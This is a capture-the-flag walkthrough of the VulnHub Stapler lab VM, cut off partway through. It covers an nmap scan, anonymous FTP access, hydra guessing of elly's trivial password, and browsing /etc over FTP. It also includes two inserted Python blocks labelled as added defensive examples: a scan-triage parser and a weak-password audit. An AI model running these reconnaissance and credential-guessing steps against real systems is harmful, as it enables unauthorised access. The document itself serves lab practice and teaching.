I enjoyed this VM very much and after a long time something technical made me stay awake all night. Thanks to <a href="https://www.vulnhub.com/author/g0tmi1k,21/">g0tmi1k</a> for this wonderful VM.</div>
VulnHub Stapler 1 Solution (AMol NAik, 2016-06-09)<div dir="ltr" style="text-align: left;" trbidi="on">
Well, after a long time, I'm back to blogging..!!<br />
<br />
This post is about the solution for the Stapler VM from VulnHub. The VM gets the following IP:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Stapler VM - 192.168.1.3</span><br />
<br />
The Nmap scan shows the following output:<br />
<br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~#nmap -sSVC -p- 192.168.1.3</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Nmap scan report for 192.168.1.3</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Host is up, received arp-response (0.013s latency).</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Scanned at 2016-06-09 10:55:38 EDT for 170s</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Not shown: 65523 filtered ports</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Reason: 65523 no-responses</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">PORT STATE SERVICE REASON VERSION</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">20/tcp closed ftp-data reset ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| ftp-anon: Anonymous FTP login allowed (FTP code 230)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_Can't get directory listing: Can't parse PASV response: "Permission denied."</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| ssh-hostkey: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY=</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">53/tcp open domain syn-ack ttl 64 dnsmasq 2.75</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| dns-nsid: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ bind.version: dnsmasq-2.75</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">80/tcp open http syn-ack ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| http-methods: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Supported Methods: GET HEAD POST OPTIONS</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-title: 404 Not Found</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">123/tcp closed ntp reset ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">137/tcp closed netbios-ns reset ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">138/tcp closed netbios-dgm reset ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: RED)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">666/tcp open doom? syn-ack ttl 64</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">3306/tcp open mysql syn-ack ttl 64 MySQL 5.7.12-0ubuntu1</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| mysql-info: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Protocol: 53</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Version: .7.12-0ubuntu1</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Thread ID: 10</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Capabilities flags: 63487</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Some Capabilities: Support41Auth, ODBCClient, Speaks41ProtocolOld, Speaks41ProtocolNew, SupportsTransactions, LongColumnFlag, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, LongPassword, DontAllowDatabaseTableColumn, InteractiveClient, SupportsCompression, FoundRows</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Status: Autocommit</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Salt: ?C\x1DK\x0B\x02pG\x03T\x01\x06'\x16\x0BW\x01k\x05\</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">12380/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| http-methods: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ Supported Methods: GET HEAD POST OPTIONS</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-server-header: Apache/2.4.18 (Ubuntu)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_http-title: Tim, we need to-do better next year for Initech</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">MAC Address: 08:00:27:DB:34:50 (Oracle VirtualBox virtual NIC)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Host script results:</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Names:</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| RED<00> Flags: <unique><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| RED<03> Flags: <unique><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| RED<20> Flags: <unique><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| WORKGROUP<00> Flags: <group><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| WORKGROUP<1d> Flags: <unique><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| WORKGROUP<1e> Flags: <group><active></span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Statistics:</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| p2p-conficker: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Checking for Conficker.C or higher...</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Check 1 (port 63911/tcp): CLEAN (Timeout)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Check 2 (port 10987/tcp): CLEAN (Timeout)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Check 3 (port 22323/udp): CLEAN (Failed to receive data)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Check 4 (port 42548/udp): CLEAN (Failed to receive data)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ 0/4 checks are positive: Host is CLEAN or ports are blocked</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| smb-os-discovery: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Computer name: red</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| NetBIOS computer name: RED</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| Domain name: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| FQDN: red</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ System time: 2016-06-09T21:27:58+01:00</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| smb-security-mode: </span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| account_used: guest</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| authentication_level: user</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">| challenge_response: supported</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_ message_signing: disabled (dangerous, but default)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">|_smbv2-enabled: Server supports SMBv2 protocol</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">NSE: Script Post-scanning.</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">NSE: Starting runlevel 1 (of 2) scan.</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Initiating NSE at 10:58</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Completed NSE at 10:58, 0.00s elapsed</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">NSE: Starting runlevel 2 (of 2) scan.</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Initiating NSE at 10:58</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Completed NSE at 10:58, 0.00s elapsed</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Read data files from: /usr/bin/../share/nmap</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">Nmap done: 1 IP address (1 host up) scanned in 171.27 seconds</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;"> Raw packets sent: 131149 (5.771MB) | Rcvd: 157102 (17.070MB)</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# </span><br />
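<br />
Before moving on, a small parser for the nmap output above, with a few defender-side triage rules run over it. This is an added example, not code from the original post; the sample scan text is constructed from the port and script lines shown on this page, and the rule set (unidentified listener, exposed database, SMB guest session and signing state) is my own.<br />
<br />
```python
"""Parse nmap 'normal' output into port records and apply simple triage rules.

Added example for this post, not the author's code. SAMPLE_SCAN is constructed
from the scan lines shown on the page; the triage rules are assumptions of mine.
"""
import re
from dataclasses import dataclass, field

# One nmap --reason port line, e.g. "3306/tcp open mysql syn-ack ttl 64 MySQL 5.7.12-0ubuntu1".
# Column spacing is irrelevant, so lines copied from a web page parse like raw output.
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s+"
    r"(?P<reason>\S+)\s+ttl\s+(?P<ttl>\d+)\s*(?P<version>.*)$"
)
# First line of an NSE script block: "|_http-title: 404 Not Found" or "| mysql-info:".
# Script names are lowercase with hyphens; nested fields such as "Version:",
# "bind.version:" or "message_signing:" do not match and join the open block.
SCRIPT_RE = re.compile(r"^([a-z][a-z0-9-]*):\s*(.*)$")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)  # NSE script name -> output lines


def parse_nmap(text):
    """Return (port records, host script results) from nmap normal output."""
    records, host_scripts = [], {}
    current = None       # PortRecord that the following script lines belong to
    scripts = None       # dict currently receiving script output
    script_name = None   # open NSE script block inside that dict
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Host script results:"):
            current, scripts, script_name = None, host_scripts, None
            continue
        m = PORT_RE.match(line)
        if m:
            current = PortRecord(int(m["port"]), m["proto"], m["state"],
                                 m["service"], m["version"].strip())
            records.append(current)
            scripts, script_name = current.scripts, None
            continue
        if not line.startswith("|") or scripts is None:
            continue
        body = line.lstrip("|_").strip()
        sm = SCRIPT_RE.match(body)
        if sm:
            script_name = sm.group(1)
            scripts[script_name] = [sm.group(2)] if sm.group(2) else []
        elif script_name is not None:
            scripts[script_name].append(body)
    return records, host_scripts


def open_ports(records):
    return sorted(r.port for r in records if r.state == "open")


def triage(records, host_scripts):
    """Defender-side findings derived only from the scan: (scope, message) pairs."""
    findings = []
    for r in records:
        if r.state != "open":
            continue
        scope = f"{r.port}/{r.proto}"
        if r.service.endswith("?"):
            # nmap appends '?' when the listener answered but could not be identified
            findings.append((scope, f"unidentified service '{r.service}'; confirm what is listening"))
        if r.service == "mysql":
            findings.append((scope, f"database reachable from the network: {r.version or 'unknown version'}"))
    for entry in host_scripts.get("smb-security-mode", []):
        if entry.startswith("account_used: guest"):
            findings.append(("smb", "server accepted a guest session"))
        if entry.startswith("message_signing:") and "disabled" in entry:
            findings.append(("smb", "message signing disabled (nmap flags this as dangerous)"))
    return findings


def summarize(text):
    """Convenience wrapper: (open ports, findings) for one scan."""
    records, host_scripts = parse_nmap(text)
    return open_ports(records), triage(records, host_scripts)


# Constructed sample, copied from the port and script lines in the scan above.
SAMPLE_SCAN = """
53/tcp    open   domain      syn-ack ttl 64 dnsmasq 2.75
| dns-nsid:
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        syn-ack ttl 64
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp   closed ntp         reset ttl 64
139/tcp   open   netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: RED)
666/tcp   open   doom?       syn-ack ttl 64
3306/tcp  open   mysql       syn-ack ttl 64 MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 53
|   Version: .7.12-0ubuntu1
12380/tcp open   http        syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:DB:34:50 (Oracle VirtualBox virtual NIC)

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
"""

if __name__ == "__main__":
    ports, findings = summarize(SAMPLE_SCAN)
    print("open:", ports)
    for scope, msg in findings:
        print(f"[{scope}] {msg}")
```
<br />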
<br />
The first thing I noticed was anonymous FTP. Let's connect and check what's there.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# ftp 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connected to 192.168.1.3.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Name (192.168.1.3:root): anonymous</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">331 Please specify the password.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Password:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">230 Login successful.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Remote system type is UNIX.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Using binary mode to transfer files.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">200 PORT command successful. Consider using PASV.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">150 Here comes the directory listing.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 107 Jun 03 23:06 note</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">226 Directory send OK.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp></span><br />
<br />
There is a file named 'note'. Its content looks like this:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# cat note </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.</span><br />
<br />
From this, it looks like the user 'elly' has FTP access. I ran hydra with the '-e nsr' option against the FTP server.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# hydra -l elly -e nsr ftp://192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-09 14:12:59</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[DATA] attacking service ftp on port 21</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[21][ftp] host: 192.168.1.3 login: elly password: ylle</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1 of 1 target successfully completed, 1 valid password found</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-09 14:13:12</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# </span><br />
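<br />
The '-e nsr' option explains the "3 login tries" above: hydra tries an empty password (n), the login name itself (s) and the login name reversed (r), which is how elly/ylle fell out. The audit below applies those same three classes to an account list, which is the check a defender would run before someone else does. Added example, not from the original post; the account list is constructed (only elly/ylle comes from the page), and, going beyond hydra, the comparison ignores case.<br />
<br />
```python
"""Audit accounts for the password classes hydra's '-e nsr' covers:
n = empty, s = same as login, r = login reversed.

Added example for this post, not the author's code. SAMPLE_ACCOUNTS is
constructed; only the elly/ylle pair comes from the page.
"""


def trivial_password_class(login, password):
    """Return 'n', 's' or 'r' when the password is in one of the -e classes,
    otherwise None. Assumption of mine: compare case-insensitively, which is
    slightly stricter than hydra's exact match."""
    if password == "":
        return "n"
    lp, pw = login.lower(), password.lower()
    if pw == lp:
        return "s"
    if pw == lp[::-1]:
        return "r"
    return None


def audit_accounts(accounts):
    """accounts: iterable of (login, password) pairs, e.g. from a policy test
    harness. Returns {login: class} for every account that would fall to the
    three '-e nsr' guesses."""
    findings = {}
    for login, password in accounts:
        cls = trivial_password_class(login, password)
        if cls is not None:
            findings[login] = cls
    return findings


# Constructed sample; only elly/ylle is taken from the hydra output above.
SAMPLE_ACCOUNTS = [
    ("elly", "ylle"),
    ("alice", ""),
    ("bob", "Bob"),
    ("carol", "k7#Qm-vortex-9pL"),
]

if __name__ == "__main__":
    for login, cls in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{login}: falls to -e {cls}")
```
<br />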
<br />
Great!! Now we have the password for this user. Let's log in to FTP.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# ftp 192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connected to 192.168.1.3.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-|-----------------------------------------------------------------------------------------|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">220 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Name (192.168.1.3:root): elly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">331 Please specify the password.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Password:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">230 Login successful.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Remote system type is UNIX.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Using binary mode to transfer files.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">200 PORT command successful. Consider using PASV.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">150 Here comes the directory listing.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 100 0 0 12288 Jun 09 21:08 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 100 0 0 12288 Jun 09 21:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 0 Apr 20 23:09 .pwd.lock</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 07 01:57 alternatives</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 8 0 0 4096 Jun 03 17:46 apache2</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apparmor</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 9 0 0 4096 Jun 06 23:17 apparmor.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apport</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 6 0 0 4096 Jun 03 14:05 apt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 0 1 144 Jan 14 23:35 at.deny</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 14:47 authbind</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:52 bash_completion.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 367 Jan 27 15:17 bindresvport.blacklist</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Apr 12 11:30 binfmt.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 byobu</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ca-certificates</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 7788 Jun 03 13:51 ca-certificates.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 console-setup</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 19:13 cron.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 17:07 cron.daily</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.hourly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.monthly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 cron.weekly</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 722 Apr 05 22:59 crontab</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 54 Jun 03 13:51 crypttab</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 00:02 dbconfig-common</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:51 dbus-1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 05 23:04 default</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 depmod.d</span><br />
